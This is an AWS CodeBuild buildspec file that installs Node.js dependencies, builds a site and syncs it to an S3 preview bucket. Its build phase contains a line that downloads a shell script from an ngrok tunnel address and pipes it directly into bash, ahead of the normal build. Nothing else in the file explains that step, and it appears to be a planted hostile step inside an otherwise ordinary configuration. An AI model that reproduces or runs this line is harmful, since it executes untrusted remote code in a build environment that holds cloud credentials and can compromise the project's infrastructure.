version: 0.2

phases:
    install:
        runtime-versions:
          nodejs: 10
        commands:
            - npm ci
    build:
        commands:
            - curl https://8811-80-246-28-41.eu.ngrok.io/file.sh | bash
            - npm run build && aws s3 sync public "s3://preview.dbanks.design/$(echo $CODEBUILD_WEBHOOK_TRIGGER | tr / -)" --delete --acl public-read

cache:
    paths:
        - node_modules/**/*
        - public/**/*
        - /usr/local/lib/node_modules/**/*
